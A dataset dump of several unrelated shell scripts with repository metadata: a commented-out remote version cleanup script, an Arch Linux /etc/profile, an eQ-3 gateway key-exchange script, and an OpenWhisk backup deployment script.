# # First list version directories to be sure...
# ##
# echo -e "${green}★ Listing remote directories for your information${nc}"
# ssh -t ${CNF_USER}@${CNF_HOST} "cd ${CNF_BASE_REMOTE_DIR} && tree -L 1"
#
# ###
# # Set remote dir to delete
# ###
# REMOTE_VERSION_DIR_TO_REMOVE=${CNF_BASE_REMOTE_DIR}/version-${VERSION}
#
# read -r -p " ♘ Are you sure you want to remove ${REMOTE_VERSION_DIR_TO_REMOVE}? [y/N] " response
# if [[ ${response} =~ ^([yY][eE][sS]|[yY])$ ]]
# then
#
# echo -e "${blue}★ Preparing to remove${nc}"
# echo -e " ✓ Removing directory ${REMOTE_VERSION_DIR_TO_REMOVE}"
# ssh -t ${CNF_USER}@${CNF_HOST} "rm -rf ${REMOTE_VERSION_DIR_TO_REMOVE}" > /dev/null 2>&1
# echo -e " ✓ Directory removed"
#
# ssh -t ${CNF_USER}@${CNF_HOST} "cd ${CNF_BASE_REMOTE_DIR} && tree -L 1"
#
# exit 0
#
# else
# echo -e "${red}✗ Canceled${nc}"
# exit 0
# fi
#
# fi
| true
|
a7f66cc147d9ba5bbe229ce2b00713d52bb2ca77
|
Shell
|
jensp/Arch-Linux-on-i586
|
/core/filesystem/profile
|
UTF-8
| 1,445
| 3.359375
| 3
|
[] |
no_license
|
#
# /etc/profile
#
# This file is intended to be used for ALL common
# Bourne-compatible shells. Shell specifics should be
# handled in /etc/profile.$SHELL where $SHELL is the name
# of the binary being run (discounting symlinks)
#
# Sections taken from SuSe's /etc/profile
# Note the explicit use of 'test' to cover all bases
# and potentially incompatible shells
#Determine our shell without using $SHELL, which may lie
# /proc/$$/exe points at the running interpreter's binary; match on its
# name. Order matters: *bash and *dash must precede *ash, which would
# otherwise swallow them.
shell="sh"
if test -f /proc/mounts; then
   case $(/bin/ls -l /proc/$$/exe) in
	*bash) shell=bash ;;
	*dash) shell=dash ;;
	*ash) shell=ash ;;
	*ksh) shell=ksh ;;
	*zsh) shell=zsh ;;
  esac
fi

# Load shell specific profile settings
test -f "/etc/profile.$shell" && . "/etc/profile.$shell"
#Set our umask
umask 022
# Set our default path
PATH="/bin:/usr/bin:/sbin:/usr/sbin"
export PATH
# Export default pkg-config path
PKG_CONFIG_PATH="/usr/lib/pkgconfig"
export PKG_CONFIG_PATH
# Some readline stuff that is fairly common
HISTSIZE=1000
HISTCONTROL="erasedups"
INPUTRC="/etc/inputrc"
LESS="-R"
LC_COLLATE="C"
export HISTSIZE HISTCONTROL INPUTRC LESS LC_COLLATE
# Load profiles from /etc/profile.d
# Source every executable *.sh drop-in, then clean up the loop variable so
# it does not leak into the login environment.
if test -d /etc/profile.d/; then
	for profile in /etc/profile.d/*.sh; do
		test -x $profile && . $profile
	done
	unset profile
fi
# Termcap is outdated, old, and crusty, kill it.
unset TERMCAP
# Man is much better than us at figuring this out
unset MANPATH
| true
|
113a98de84588f47893ab6d99d9285d13792956f
|
Shell
|
litti/dccu2
|
/x86_32_debian_all/bin/setlgwkey.sh
|
UTF-8
| 1,075
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Perform a key exchange for every pending /etc/config/*.keychange request.
# Each file supplies Serial=, IP= (optional), KEY=, CURKEY= and Class=
# (Wired|RF); a successfully processed request file is deleted.

# Iterate the glob directly: the previous `[ -f $UPDATEFILES ]` guard broke
# ("too many arguments") as soon as more than one file matched, and the
# `ls` round-trip mangled unusual file names.
for F in /etc/config/*.keychange
do
	# An unmatched glob leaves the literal pattern behind; skip it.
	[ -f "$F" ] || continue
	echo "Processing update file $F"
	#parse the file
	# Anchored sed extraction: the old `grep KEY` also matched CURKEY=
	# lines, so KEY could end up holding two mangled lines.
	SERIAL=$(sed -n 's/^Serial=//p' "$F")
	IP=$(sed -n 's/^IP=//p' "$F")
	KEY=$(sed -n 's/^KEY=//p' "$F")
	CURKEY=$(sed -n 's/^CURKEY=//p' "$F")
	CLASS=$(sed -n 's/^Class=//p' "$F")
	#Check gateway class and set rfd.conf / hs485d.conf path
	# "=" instead of "==": this runs under /bin/sh, where == is not POSIX.
	if [ "$CLASS" = "Wired" ]
	then
		#Wired
		CONFFILE=/etc/config/hs485d.conf
	elif [ "$CLASS" = "RF" ]
	then
		#RF
		CONFFILE=/etc/config/rfd.conf
	else
		# Unknown class: abort the run, matching the previous behaviour.
		exit 1
	fi
	#Start key exchange: address by IP when given, else by serial number.
	if [ -z "$IP" ]
	then
		#echo "Using Serial"
		eq3configcmd setlgwkey -s "$SERIAL" -c "$CURKEY" -n "$KEY" -f "$CONFFILE" -l 1
	else
		#echo "Using IP"
		eq3configcmd setlgwkey -s "$SERIAL" -h "$IP" -c "$CURKEY" -n "$KEY" -f "$CONFFILE" -l 1
	fi
	# On success delete the processed key exchange file
	if [ $? -eq 0 ]
	then
		rm -f "$F"
	fi
done
| true
|
fdfb9ac629f272132af7438e76440bb8d45937cf
|
Shell
|
paulcastro/dinkum
|
/whiskPackage.sh
|
UTF-8
| 1,313
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Deploy/remove the OpenWhisk nightly-backup package.
# `source` and the $(<file) redirection are bash features, so the shebang
# now says bash (it previously claimed /bin/sh).
source local.env
PAYLOAD=$(<payload.json)
# Tear down the backup package: rule, trigger and all actions.
function uninstall() {
  echo "Disabling rule"
  wsk rule disable backupFromTrigger
  echo "Deleting trigger"
  wsk trigger delete backupTrigger
  # Log text fixed: these commands delete; they never updated or created.
  echo "Deleting actions"
  wsk action delete getApiToken
  wsk action delete getServers
  wsk action delete createBackup
  wsk action delete authorizedBackup
  echo "Deleting rule"
  wsk rule delete backupFromTrigger
}
# Create the nightly-backup trigger, actions, sequence and rule.
function install() {
  echo "Creating trigger feed"
  # "$PAYLOAD" was previously wrapped in single quotes, so OpenWhisk
  # received the literal string $PAYLOAD instead of payload.json's contents.
  wsk trigger create backupTrigger --feed /whisk.system/alarms/alarm -p cron '0 0 23 * * *' -p trigger_payload "$PAYLOAD"
  echo "Creating actions"
  # Credentials/endpoint come from local.env (sourced above); quoted in
  # case any value contains whitespace.
  wsk action create getApiToken getApiToken.js -p host "$IDENTITY_HOST" -p port "$IDENTITY_PORT" -p endpointName "$ENDPOINT_NAME" -p userId "$USERID" -p password "$PASSWORD" -p projectId "$PROJECT_ID"
  wsk action create getServers getServers.js
  wsk action create createBackup createBackup.js
  # Sequence chains the three actions: token -> server list -> backup.
  wsk action create --sequence authorizedBackup getApiToken,getServers,createBackup
  echo "creating rules"
  wsk rule create --enable backupFromTrigger backupTrigger authorizedBackup
}
# Print a one-line usage hint for this deployment helper.
function usage() {
 echo 'whiskPackage.sh with options --install, --uninstall, --update'
}

# Dispatch on the first CLI argument; anything unrecognised shows usage.
case "$1" in
  "--install")
    install
    ;;
  "--uninstall")
    uninstall
    ;;
  *)
    usage
    ;;
esac
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.